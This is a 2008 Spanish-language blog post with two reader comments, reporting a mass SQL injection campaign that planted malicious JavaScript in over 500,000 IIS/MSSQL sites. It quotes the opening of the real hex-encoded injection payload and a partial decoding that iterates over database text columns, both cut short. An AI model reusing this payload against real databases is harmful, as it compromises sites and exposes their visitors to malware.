Cientos de miles de sitios web que utilizan Microsoft IIS y MSSQL Server como sus motores fueron atacados mediante un ataque de inyección SQL, para poder incluir código javascript que redireccionara a sus visitantes a sitios maliciosos donde se prueban todo tipo de vulnerabilidades para lograr instalar malware en las computadoras de estos. Según F-Secure, una búsqueda listando cadenas específicas de la infección arroja más de 510.000 sitios afectados:
El ataque a los servidores MSSQL se logró inyectando una serie de sentencias en su mayoría codificadas en hexadecimal, que comienzan así:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006...
Y traducido a texto sería lo siguiente:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b...
Entre los sitios afectados se encuentran muchos de renombre como la UNICEF o las Naciones Unidas, así como de múltiples compañías serias y confiables, por lo que cualquier visitante está expuesto hasta que el código malicioso sea removido de todos los sitios.
Como usuarios, la única defensa posible es en primer lugar, no utilizar Internet Explorer, al cual van dirigidos la mayoría de los ataques; en segundo, usar Opera (deshabilitando plugins y, si se quiere aún más seguridad también los scripts por defecto) o Firefox con la extensión NoScript.
Vía Kriptópolis, F-Secure, The Hacker Webzine.
Entradas Relacionadas
Comprometiendo equipos vía Flash
La confiabilidad de Google en entredicho
Un pdf puede infectar Windows XP
2 comentarios
Comentarios asociados a este artículo
Enlace al trackback
http://geekotic.com/2008/04/26/ms-de-500000-sitios-web-comprometidos-para-infectar-con-malware-a-sus-visitantes/trackback/
26/Abril/2008 a las 23:27
Gabriel
Usando
Opera 9.50 en 
Windows Vista
Si bien es cierto que la mayoría de los sitios atacados corren IIS y MSSQL, no es una vulnerabilidad de estos lo que utilizan para el ataque (lo aclaran en F-Secure) sino una vulnerabilidad de los propramadores que no toman las precauciones pertinentes cuando validan lo que ingresan los usuarios en los formularios en sus sitios. Este mismo ataque puede dirigirse a cualquier motor de base de datos. Es cierto que es un poco más facil atacar un MSSQL porque permite encadenamiento de sentencias separadas por;.
Lo que me molesta y mucho es la forma en presentan la misma noticia en Kriptópolis.
27/Abril/2008 a las 15:30
Gabolonte Blasfemus
Usando
Opera 9.27 en 
Windows XP
En este comentario de Kriptópilos lo explican bastante bien. De todas formas me quedo la máxima del que le sigue:
“Es que no puede ser que me paguen 30 Euros y encima querrais una página web segura contra cualquier ataque” :D